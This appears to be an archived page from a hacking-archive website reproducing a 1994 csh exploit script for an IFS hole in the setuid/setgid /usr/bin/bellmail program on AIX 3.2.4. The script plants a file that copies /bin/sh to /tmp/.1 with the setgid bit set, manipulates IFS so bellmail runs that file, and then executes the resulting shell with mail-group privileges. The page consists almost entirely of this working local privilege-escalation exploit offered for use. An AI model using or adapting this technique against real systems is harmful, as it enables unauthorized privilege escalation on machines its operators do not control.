AOH :: Unix :: Various Flavours

AOH :: Unix :: Various Flavours :: BMAIL-SH.TXT
IBM AIX Exploit hole in /usr/bin/bellmail


#!/bin/csh
# Written by A-Flat - June 30, 1994    

# Exploit IFS hole in /usr/bin/bellmail to give us GID=mail.   
# Tested on AIX 3.2.4 

# -r-sr-sr-x   1 root     mail       30340 Jun 18 1993  /usr/bin/bellmail
# sum:  47709    30 /usr/bin/bellmail

cat > usr << EOF
IFS=" "
export IFS
/bin/cp /bin/sh /tmp/.1
/bin/chmod 2777 /tmp/.1
EOF
chmod 755 usr
setenv IFS /
echo " "
echo "At the ? prompt, send mail to a user (m username)"
echo " "
bellmail
unsetenv IFS
rm -f usr
echo " "
echo "Executing SGID mail shell."
/tmp/.1
rm -f /tmp/.1

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.